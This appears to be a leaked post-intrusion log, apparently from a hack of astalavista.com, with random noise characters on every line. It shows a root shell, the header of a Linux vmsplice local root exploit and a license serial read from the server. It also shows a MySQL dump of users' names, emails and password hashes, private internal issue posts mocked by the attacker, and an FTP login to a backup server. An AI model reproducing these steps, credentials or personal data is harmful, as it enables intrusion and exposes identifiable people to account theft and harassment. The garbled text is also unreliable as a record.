$ T3 I" @9 z$ s2 y) [3 [total 141208
" N& Y$ E8 W; R* t/ |8 v1 e$ x _drwx–x–x 10 com com 4096 Apr 28 12:40 .
9 W4 z N! u3 E+ L+ }* s! t3 C% Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 N- Z; ^# e3 u: odrwx—— 2 com com 4096 Jun 4 04:04 backups9 [: ]# K' N' g! b7 I6 P* b: H
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql: S# |) Z L" K/ K
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
. m2 L4 C+ C$ ^, s1 H-rw——- 1 com com 21880 Jun 2 08:07 .bash_history9 h* R, w$ ^# h+ L8 r! \& i8 g
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout+ b; Z6 _% B' K# K7 u7 _
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile; r. N$ T4 o; m6 |
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
3 P- G0 Q" K) I5 @2 Udrwx–x–x 3 com com 4096 Jan 29 2008 domains
8 C* {$ o- m* j! W, Z" g3 ^/ c) s- r-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed4 B9 N) {# D0 Y& s
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
; p7 j, `) m3 E-rw——- 1 com com 69 Nov 18 2008 .lesshst
5 V- g; w* u. K' hdrwx—— 2 com com 4096 Sep 24 2007 mail6 E/ q3 i: H: ?; B1 ^2 |
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history$ M: ]) L! g$ L
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
% k& w5 `" u1 N# @lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
% u: I% i/ ]% o8 R( c9 n-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
/ G4 ~0 y+ G( Jdrwx—— 2 com com 4096 Aug 26 2008 .ssh& U5 t7 o2 q' o* Q% W" o1 z' a! K
-rwx—— 1 com com 8515 Feb 10 2008 t
2 G( G. F- f+ l* W0 q7 [ H-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
% c5 H0 {7 S' p1 l5 D" Jdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp6 w8 s3 r- C, B" A/ x2 z
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
; d% J9 Z0 ?: ]7 p0 |-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
. `# l% ]& {# u% s: s6 S) u-rw——- 1 com com 16629 Mar 28 21:46 .viminfo: d& ~7 ?1 j, K1 D5 _
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
* S5 f% f' S0 t& h' S& R7 k" ~
2 l% N" v7 |' D* vsh-3.2# head t.c, h+ f) J3 k$ B
/*
r- z' {9 I! ]7 W* jessica_biel_naked_in_my_bed.c' r, K8 V9 I0 N, B6 Y" C
*
& [& M$ t" z; y7 a* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.5 t, v& n8 n& f6 c4 m
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
1 J. l& `8 Q9 W' L' j* Stejnak je to stare jak cyp a aj jakesyk rozbite.% M" p( _' m ~9 I
*
+ ^+ _8 ]9 W1 l9 O$ K* Linux vmsplice Local Root Exploit
8 P* I+ \& a7 g/ Q. ]% _2 U' J2 E3 X* By qaaz
* e- b) C; i4 X# n/ D% S6 N*( u- F3 B- L- y9 S& w
, E! f; o F: u+ b9 c w8 h% ~sh-3.2# cd /
5 R8 |. G, x$ Ush-3.2# ls -la
' d8 w+ F: O. S7 Z+ Ototal 360- j D: y7 ]# T( k
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
2 x0 I) o( z x; [! c* S7 q7 O3 Ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ N3 `1 g9 W0 p# u7 B
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group0 t# _8 S; P% G' t0 U {
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user) Y' a: d6 s6 h* k1 G$ L
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db5 v) g" x& [6 F5 j. y1 p4 ~
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
* `( L+ e' I- c4 z2 S0 B-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
1 |, |1 X, W) r" L( H. c4 q1 Y& Zdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup. v; O) H/ @8 R: ] r% X- ^
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
- u6 v8 x0 Q2 ~8 B- I8 N# rdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot) O- w/ f7 G7 z8 B2 {
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
3 s3 ]& ^3 b; u. g/ `2 X( Cdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc7 k4 G# F0 u( B9 R# ~# ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home# _' q1 R. ]9 B R* f
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
- r# [# M) l8 i* ~; f# s: ~- i$ Z, I# Mdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
; z! X. {, Z1 q6 D2 odrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib647 P+ r% C& h& g) `
drwx—— 2 root root 16384 Sep 11 2007 lost+found! o& L; A( N% c+ y4 M- n1 g% |9 K
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
' T3 r% W" p* E5 l, r. K+ O3 [drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
r5 x# H, R2 `+ x8 Y$ Wdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
: N% U( n& Y* J8 t-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg& O2 E6 o6 i4 T' q `+ S& `
drwxr-xr-x 2 root root 0 Jun 3 02:43 net$ k% r& `! R5 ~ J, b
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
b3 _+ ]' {, I' y# {% C. mdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc% q' v- E/ w" m! I; M$ c* y
drwxr-x— 15 root root 4096 Jun 4 08:40 root7 x- ?/ Y l* m% e$ _
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin8 @' m3 e8 E* f* j) U
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux7 P, p4 }4 Q: y; `, |9 w6 {
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
1 R) e6 c' x6 Jdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
- C) c6 A. _3 v( I3 `. }drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
/ u7 X7 F4 O: Y( z6 v- edrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
8 ?5 `: a& o' \. O( @1 ]# tdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
( A1 i0 G. t; A4 V5 o
% m9 j, [. w$ \3 Ssh-3.2# cd opt( @# N' f, j. M+ g3 y
sh-3.2# ls -la
2 s5 [ ^, o2 \total 209 @4 [# _0 C& t' A% C0 l" S) R
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .: u; [! _! G! w+ g3 ^
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ @/ y: `% F$ f3 y' Ddrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws5 C% f! N3 F; {4 n! U0 ]
# P0 T6 r; C- S% X: P' J( e3 z! M
sh-3.2# cd lsws/
* d6 s' A* r0 l. c1 Y. C1 D# M Esh-3.2# ls -la
" H2 g, J% ]- rtotal 108
) L# ^& ~* O3 rdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
! }0 @) h" E7 [3 d I2 zdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..0 E1 R3 b% Y3 D, \
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
9 f2 W& [5 ?4 k! L8 ?drwxr-xr-x 13 root root 4096 May 29 15:10 admin2 ?& g- ~2 n6 F! Y* `# l
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
/ V$ x% p. P, X$ N3 w/ \/ j2 {drwxr-xr-x 2 root root 4096 May 29 15:10 bin/ D% Q, M* a( X1 A( w# V
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
( A: n" \- G/ t w4 M, K. R' K8 gdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT; T3 M! ?1 T% f
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
' y- k8 ~1 ?" }drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin* p0 O+ j1 f* l0 h8 M: ^' U
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib' |) Q/ T, U, G6 y
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
# U- A4 d( N% s; F-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
0 h0 V4 b3 c6 N2 ]9 K-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
4 y; z4 H* H Z-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
# |4 e- H" q! \4 U) Q' _4 Cdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs. G& C2 X: c* G2 L, s4 B$ Z7 ]( z
drwxr-xr-x 2 root root 4096 Mar 20 2008 php# B9 k0 L2 V8 T% p" {
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild5 f' n8 T0 z1 a" E' o6 }
drwxr-xr-x 3 root root 4096 Mar 20 2008 share s- n3 F; m/ @# u
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
; {" k0 R3 }0 Z5 {+ C9 b: M" m5 i% C5 r7 B, R" w4 u% B2 n0 y
sh-3.2# cd conf
& e- G1 L `& ~, B2 hsh-3.2# ls -la
9 k7 ~- R: K. u, c$ f$ k; l( L9 Ntotal 48. L+ ^( q! ^9 J5 N( M6 M
drwx—— 4 apache apache 4096 Jun 3 02:43 .
4 ^/ L" ?3 F9 p( K) ]2 O% cdrwxr-xr-x 15 root root 4096 Mar 20 2008 ../ v% u9 S$ W% ]: V8 r' {3 o% G. h" N+ g
drwx—— 2 apache apache 4096 Mar 20 2008 cert0 J# }. G) `# i0 v
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
3 N, f) [- S) Y-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak" b ~+ Q3 h8 Y0 ~. Z2 ]
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last) }) {( Q# Q: j% s5 _+ C
-rw——- 1 apache apache 256 May 29 15:10 license.key
( E' c+ y/ ?7 v8 e3 h, e' F( b-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
' j/ G% _# f! c( n0 C-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties( R( c8 |, Y8 p- r& T9 I6 T
-rw——- 1 apache apache 20 May 29 15:10 serial.no
6 u# a8 D% j* |4 {8 ldrwx—— 2 apache apache 4096 Mar 20 2008 templates
, k& `. y( l A8 S6 |3 \) [/ r! P8 Z% J0 t0 E/ E
sh-3.2# cat serial.no* f, F0 i. Y# H! m/ a
IbDl-oVsO-CKqL-wVRa
+ ?& \4 L$ u' o/ D- K8 q2 i, O( R% j# w, ~/ {6 R& U1 m
sh-3.2# mysql
$ S+ z: |9 `. L# \2 VWelcome to the MySQL monitor. Commands end with ; or \g.( u# }/ l0 B( V V9 @& K! d2 i
Your MySQL connection id is 286844
" s" T! L. _, t7 A- {Server version: 5.0.45-community-log MySQL Community Edition (GPL)
: E: s2 P; I G+ F- K5 U/ t+ `6 n8 y+ b; C" F0 _
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.% E" t, I+ J0 u
; u1 s& R( ]- Umysql> show databases;. \8 A) ~. c- [3 ~) S& o K
+———————–+
- M; V2 W5 y8 Z+ t| Database |
5 W \. ?7 P0 a2 f4 e9 D8 d; U8 A+———————–+
1 A# ?% q: d8 U& u" s1 C$ c| information_schema |
4 r0 \5 r' ^; B& u+ E6 n# K| astanet_ads |
: s4 Z3 x& P. |2 X| astanet_mailing_lists |" G5 H8 C5 P7 N' G0 ?! v
| astanet_mediawiki |: `# p, L5 U+ e4 n2 z
| astanet_membersystem |9 J- i' e. N6 v! l4 h
| com_contrexx |* t! m* T( D. o: d& T6 c
| com_contrexx2 |
4 j' |$ P/ T! H' s| com_contrexx2_live |# _# C! [( e) D" `
| da_roundcube |! B% y$ D; o- F
| dolphin |
2 v/ G0 d% [) h7 ]% p/ O8 W& h' n| ideapool |
+ C$ B& r* e. ` L- c| mysql |
' M' d& l, G4 A8 W3 X1 `" n| test |+ l, x* A/ R+ Y: R3 W, W3 d5 k
| yourmaster |, u4 w8 d/ ~" s
+———————–+
' c8 P) v2 k4 Q! a14 rows in set (0.00 sec)5 c, f! y9 K* z0 @$ {' \
$ q8 E4 n5 e* s2 ^/ rmysql> use ideapool9 j3 n1 _' u; X2 i, }1 q+ \. w
Database changed
' w5 T' |' y; \) |mysql> show tables;! P+ d4 A6 Y6 I) i7 R( k, S& j. _
+———————————–+
! n; j. t" D' y" v: r| Tables_in_ideapool |
! Q6 ], ~& m0 Z: F; Z9 y+———————————–+
6 g9 H, s* U6 h# p3 n9 z1 @| eventum_columns_to_display |
& ~7 f2 t2 @. Z, s& f| eventum_custom_field |. m: }6 j; t |0 r! D
| eventum_custom_field_option |9 H/ U+ |" i+ o0 e6 d
| eventum_custom_filter |
: C( S. o7 k. \( u8 ^% q| eventum_customer_account_manager |2 a* ^: g. x( a) b7 M* G
| eventum_customer_note |
7 T: A( L- n0 U. J| eventum_email_account |) r. v/ ^4 c! g$ F- {" G+ S) {7 k- [
| eventum_email_draft |7 }4 T/ ?' G: |5 T& |3 w* @
| eventum_email_draft_recipient |
8 C2 ]5 }1 z( o c| eventum_email_response |
* k8 d2 _; N, r+ w2 y V; G| eventum_faq |6 i T ?3 Z7 o0 A: Z
| eventum_faq_support_level |
- p3 r ^7 ^7 f' w1 u| eventum_group |2 Q l3 y O) t
| eventum_history_type |
% L$ V1 {: J' O( n, t$ s| eventum_irc_notice |; {* J$ E- J$ _) A
| eventum_issue |3 R9 C8 } b4 v6 s* U. k; T5 @
| eventum_issue_association |; e0 l5 T7 ?& O; c3 w
| eventum_issue_attachment |& U2 T- K5 z5 {; x4 X: q& y
| eventum_issue_attachment_file |' i1 G5 Y' V/ h; `8 i
| eventum_issue_checkin |
" [0 Y: ~. _8 e" e/ {3 m9 a: T* e| eventum_issue_custom_field |
6 e' v1 X; S9 U, s' x| eventum_issue_history | @/ r, U0 m& k( {) h
| eventum_issue_quarantine |
3 U! k% D3 r: D' q| eventum_issue_requirement |. z) [% M1 }7 z1 u0 h9 ^" h
| eventum_issue_user |
& n: v8 e2 @( x: T$ @0 F/ b| eventum_issue_user_replier |1 s2 G( A4 \/ \2 i
| eventum_link_filter |
0 `/ }+ C3 b V+ Z3 y2 r2 \| eventum_mail_queue |
& x2 {% X* G8 Z- f0 R, ]" J3 G| eventum_mail_queue_log | i# E- s+ E& d
| eventum_news |
{$ b6 L- c0 `% a6 t" `) F3 P6 `| eventum_note |3 }' V0 [" h9 q; Z _4 T3 @
| eventum_phone_support |
& c {0 ]. e9 c: y| eventum_project |
7 d6 v& B% k* W: O: ]% e| eventum_project_category |$ c3 @0 b) S: e% M" h. L
| eventum_project_custom_field |
; H9 j) y7 x( J" N2 C| eventum_project_email_response |
* u- G( m) {( G1 d9 |2 N| eventum_project_field_display |
0 L) B% B/ s' u) X& n; Q; Z| eventum_project_group |
2 i$ @* q( _7 `1 v| eventum_project_link_filter |
& z2 h0 Q; q! y" c7 V| eventum_project_news |* w$ b' A, T& o* ^ m* e( t( b* z& t
| eventum_project_phone_category |
9 J% i1 U3 C6 f' ?* I$ Z| eventum_project_priority |8 o$ i% }! R2 ^" I. D8 l; ]. }
| eventum_project_release |8 V0 P: D. }) i7 `# T5 Y
| eventum_project_round_robin |( d6 e+ y) Q# ?2 }" ?
| eventum_project_status |0 _- W3 P1 A0 b
| eventum_project_status_date |
6 N/ s' E; y+ Z: f| eventum_project_user |
! s& }4 T2 y' a" ^5 B. R3 E| eventum_reminder_action |
5 F* A3 b v2 }) } a/ M+ I| eventum_reminder_action_list |
# w4 Y/ C9 e* U; N* ~3 c| eventum_reminder_action_type |
) [" w3 {/ @6 n$ L4 c1 X" A$ W| eventum_reminder_field |
9 ^ f2 H* f( D7 f& R| eventum_reminder_history |
+ i- v5 j+ L% i, h! O- J| eventum_reminder_level |0 g% }( B" ~3 `, S, Z' ~3 S- b! g
| eventum_reminder_level_condition |, y5 b0 k+ ?: J& C/ w2 w7 d
| eventum_reminder_operator |
/ [% s( N& e/ ^3 \( {| eventum_reminder_priority |1 U3 ~' m8 e: s2 o9 x7 \/ d& h
| eventum_reminder_requirement |
0 F" P1 M, r# }; p y5 Z| eventum_reminder_triggered_action |
7 C! c% {5 Z8 k& V| eventum_resolution |
5 x4 O+ P% ^& U1 @| eventum_round_robin_user |
" |1 u. @) ^. w8 E* ~8 s M. ?| eventum_search_profile |2 a) X& J# v0 a/ N$ A
| eventum_status |
L0 K/ K( @+ y9 P3 L" I) l( B| eventum_subscription |" r# {; ?" b( N( f' w2 D
| eventum_subscription_type |
' y7 a$ j: e7 s: B3 g h| eventum_support_email |
* x2 q+ m! H b* G- x| eventum_support_email_body |
5 C: ^' M; C8 B3 z2 `# q| eventum_time_tracking |( W% K' u. v& {+ T& A
| eventum_time_tracking_category |
4 @0 C) E# m2 ?! |7 j7 V, _| eventum_user |
) B1 Y% x+ R; U* z+———————————–+- M6 Q' ^+ h, X$ s
69 rows in set (0.00 sec)& _: V# C* x6 ~$ x$ Y2 j& u
) w9 t- n- K7 |" z( F
mysql> describe eventum_user;
' P4 c5 U; X8 Q! A( b+————————-+——————+——+—–+———————+—————-+1 M; r( Q' b$ I3 Y( t3 \/ Q
| Field | Type | Null | Key | Default | Extra |/ \6 p8 s6 V" b" u& s
+————————-+——————+——+—–+———————+—————-+
8 B" E6 r+ d5 B% Z( C% Y! K| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |* K$ T# e0 L1 X
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |; r7 L, t; H. ~% f7 S1 U$ Z: a( {
| usr_customer_id | int(11) unsigned | YES | | NULL | |
3 Y9 l0 P3 y. g| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |# W4 ?6 q; Y0 a
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |7 t' t1 b) E8 b4 x s
| usr_status | varchar(8) | NO | | active | |
! n, n- q) j7 b; a* O# k7 O5 q5 Q% t| usr_password | varchar(32) | NO | | | |
1 ]9 P. n1 y' |: Z| usr_full_name | varchar(255) | NO | | | |3 R, q+ P2 H7 i: l, S3 I8 ?; w. N# g
| usr_email | varchar(255) | NO | UNI | | |
) |" A1 h# h" || usr_preferences | longtext | YES | | NULL | |
& d8 L. E3 }* x| usr_sms_email | varchar(255) | YES | | NULL | |
( K& Q) {2 e! l. i, |5 @$ x9 e| usr_clocked_in | tinyint(1) | YES | | 0 | |4 @% t$ C5 j( }" a# k! _
| usr_lang | varchar(5) | YES | | NULL | |; i% L7 e/ V. F0 v/ Z
+————————-+——————+——+—–+———————+—————-+ K, w& `. P: S" l# }! s' L5 v
13 rows in set (0.00 sec)+ Q* O2 v3 {. Q! I: P3 g& p* D
: ?* a$ O3 N9 b# D
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
* D8 P1 R$ E; e3 l# e+———————-+——————————-+———————————-+' u2 J2 p8 ^. k; |1 A. ^: t3 O, _
| usr_full_name | usr_email | usr_password |1 ?5 r3 X& z' h
+———————-+——————————-+———————————-+
" _5 z; W/ D. n9 q- U2 D| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |- q' u( Q9 X* E0 E: N+ B
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
7 ^4 h- ^2 c. e b7 D| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |& |# A1 v6 I0 q' Z r
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
8 d0 w. Q& s0 U" M, X| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |% Q8 _+ g/ B J2 `% c* K: p
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |7 O3 G' @9 {7 T$ q# D3 J1 \" c
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |+ d. l0 e3 q$ n! _, x* l4 G# U
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
) M2 p0 \% d# o| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |8 W9 r5 b7 ^' I+ J& n/ m' `
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
) K, a5 d2 p ~+ _7 S% w% } w| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |& N: j; _8 }. h9 b# B) i5 t; y. T
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |# `6 S4 ~! _' c C$ y. P% {
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |: F/ n' Q E/ u+ s
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
0 w( T6 x7 o. I; t$ j| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
2 R9 C% o+ P! i4 N# V3 Y7 L+———————-+——————————-+———————————-+
A/ f) f: m% P, d1 L15 rows in set (0.00 sec)
3 b ~- d4 z3 H0 J
) X' D7 w2 |+ b2 S) xmysql> select iss_description from eventum_issue where iss_id = 43;
2 U2 O% \$ h' A/ c) x) u+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* C' J1 Z4 @' f3 N3 z
| iss_description 7 M4 H: f9 u& y* v+ u
|3 T7 f2 N/ l p, U/ i
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 D4 D6 ?* Z' A: o
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be' s1 P b7 z+ S5 Q
connected for 90 mins… 120mins… so what i propose is something like:
8 e8 D0 R, d4 M6 E链接标记[url]http://www.surfthechannel.com/[/url]
7 b9 \# K' Q3 msince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system) A$ h$ V/ m8 V; J
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
. O- d1 v3 |! qbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off& l9 Q# H0 L3 x, R5 K( j) }
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
3 z1 A* L2 ^5 C c8 q7 s0 w6 {, ?' p$ X+ ~" ^
We could also put advertisement during play on the flash video player itself… extra $$…
4 `+ s2 X. H. v/ \1 l! M
2 r3 b' P$ `' e& `% L" dBy sykadul |' e0 _/ `2 Y9 v
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 E, y! T1 s& {1 row in set (0.00 sec)
5 q% G' K! O: @) i1 }- }! M% l( l7 r- n9 y; W9 M* N; ~4 j
// Money and extra $$ is all they care about. remember that.& O; {9 I) M8 k6 K, X! K
4 ~. l# C/ `) F8 t, S. J6 _
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
9 n# J+ U3 p4 E5 R+————————+——————————————————————————————————————————————————————————————————————————————-+
" F% n0 ^; n; H% ]5 ~# c0 s! j| iss_summary | iss_description
2 _$ ]* X* u" Y- D, x1 e|
( b% k# U5 N5 S& p8 K+————————+——————————————————————————————————————————————————————————————————————————————-+
& t6 n4 c8 U' e6 K: l; U3 e2 [| Forum for REAL EXPERTS | Hello,
, z( E u h) e: i! B7 r
/ H. ~1 B, }' G8 H. x# \2 nIshtus and I,
6 t Z. U6 K2 |4 G0 Z- s4 d8 K
9 A% v; B$ d9 v, BCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
0 j$ w, K- v9 G" T8 hONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
# v7 |: F/ G) B8 F: S) n
* s8 b" r, K7 C6 r, N* G# p& TOne example a friend of mine from coresecurity.com!
' R7 u8 J" m2 S
% M" }! W" F; ]2 ^! \We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..7 I9 s. v6 O5 X' C* Q
8 ^2 C' ]# a9 J+ `& n$ a- w|) x5 ^3 D& g# T0 J3 m& {
+————————+——————————————————————————————————————————————————————————————————————————————+
) P# F" v4 q& p4 k1 row in set (0.00 sec)8 ~, o9 k i( m" E" z% w4 {: m
) M# l. Z4 A% l* F! u
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
# p& n, @, g j" b# C
( w3 R! ~9 L- t/ Umysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
|/ d; G. V" L) X4 w- g5 `2 F+——————+———————————————————————————————+
7 C8 T2 n0 k( I& H| iss_summary | iss_description | y. p" U( N5 _9 b& P
+——————+———————————————————————————————+- f5 ~9 }+ l8 K, n! U+ ?
| Website guidance | Virtual Girl which guides you trought the website.- v6 j) C& ~. N7 H* W4 U
. A" E& ]4 W% o; F* WWe need a girl with who you can ( talk )!!!0 n) D1 W& [& P
Also for the News!
. j7 |1 a2 C$ W; [) z& lSo my suggestion is a girl who read you the news loud if you like!0 {3 Y& K2 X& S+ M
you can choose between read yourselfe or she read it for you or both!
8 x( j" P2 K1 R/ [' j/ _0 Z' l; K8 @" D- H3 X$ |) @8 @3 c
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
1 u) W8 q% B! N% l3 P. K
: X* j3 A0 P B7 f8 O0 QHave a look on the example girls!!$ w, b: r# e' I# v3 B! x0 J
" m2 Z# |: T/ Q) D+ U4 Z
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
7 S+ L, `# x7 Q4 d- s3 c5 n0 c& Y5 J2 C8 i
or that
0 e4 n9 W# S q+ S
; y/ H0 }$ M# M4 o% l$ E链接标记[url]http://www.yellostrom.de/[/url]4 f9 U$ X( J i9 d& ?% |1 F
5 T" V: C0 F) X& ^% H+ N" t|
. v7 ~8 F- Q& |3 l4 n% z1 o0 r+——————+———————————————————————————————+; s7 k! _. |- a% [3 Q& C5 n
1 row in set (0.00 sec)
" S) R+ Y0 z0 t9 w$ e2 g0 n$ P, {0 f4 A( c( Y! y2 D- Y
// ha ha.
( E/ o! z- d& X4 M0 s, N/ `8 {+ t
8 o8 ?7 d6 d0 L. t: H+ b8 zmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
* @% Q+ }+ l0 o6 |2 d5 p9 c+————————–+———————————————————————————————————–+8 K" r7 e* J4 {; A2 X5 R
| iss_summary | iss_description |
% H+ F8 ~. Y9 s) w+————————–+———————————————————————————————————–+" j d" ~; K( |; K! z" ]" e5 \
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
. F7 w* f8 [6 }9 ^' N" l+ G+————————–+———————————————————————————————————–+
$ j* U2 c9 H0 ]- W1 row in set (0.00 sec)7 c. p, s2 H4 L7 \# } d, U: G, G
8 H# o9 H# x; ?8 B7 R// LOL.) g9 b; R, l' h9 r- Z) s( N+ I
0 }3 M3 G$ T( X+ J: H1 Jmysql> exit6 e1 ]: H0 s" B5 w) k$ W' n. g; @
Bye
% m9 ^4 }2 _: w. ^2 J B
- D% B# j# P5 a$ osh-3.2# ftp 212.254.194.163
/ k4 t! i. E D! v2 B! wConnected to 212.254.194.163.
0 t1 c) u1 J/ \4 o; z+ }% N220 BackupCOM_VW FTP server ready., X* c4 ^' S4 [' H$ N- D
504 AUTH: security mechanism ‘GSSAPI’ not supported.: P, X1 Y3 M8 N) C- q$ t* _0 i+ y. E
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
4 }( t4 F7 e% N" \9 @KERBEROS_V4 rejected as an authentication type( N8 Y; K( j) K$ w0 W b9 T9 h
Name (212.254.194.163:root): astalavista.com9 R4 v/ x4 n, W i; k; u% [
331 Password required for astalavista.com.: L8 Y( j' Z5 y8 p- T7 |" D
Password:
3 S5 E# \; ?0 w8 }1 C230 User astalavista.com logged in.+ m0 ^' R- H& {& G
Remote system type is UNIX.1 G8 q' K+ N E
Using binary mode to transfer files.
, ~) e8 \3 @4 j1 x+ U" gftp> ls -la
& w% _4 U* R& h/ q; c& c3 d/ C$ i227 Entering Passive Mode (212,254,194,163,2,188)- \: @& R9 d: r- f N+ ?# i! l
150 Opening BINARY mode data connection for ‘file list’.
7 d# K9 P! \# Z7 z& cdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
6 U' c* t( ?3 ` E: W226 Transfer complete." [% m' H9 `9 f& e3 \9 i- x
ftp> cd astalavista.com
/ E( R4 ^! L. C250 CWD command successful.# a9 n: W% R$ y$ S4 l
ftp> ls -la
1 N+ F# ]7 b5 v* Z* x" q: j3 t; W227 Entering Passive Mode (212,254,194,163,2,189)& Y1 v4 e6 c/ ]/ O$ N
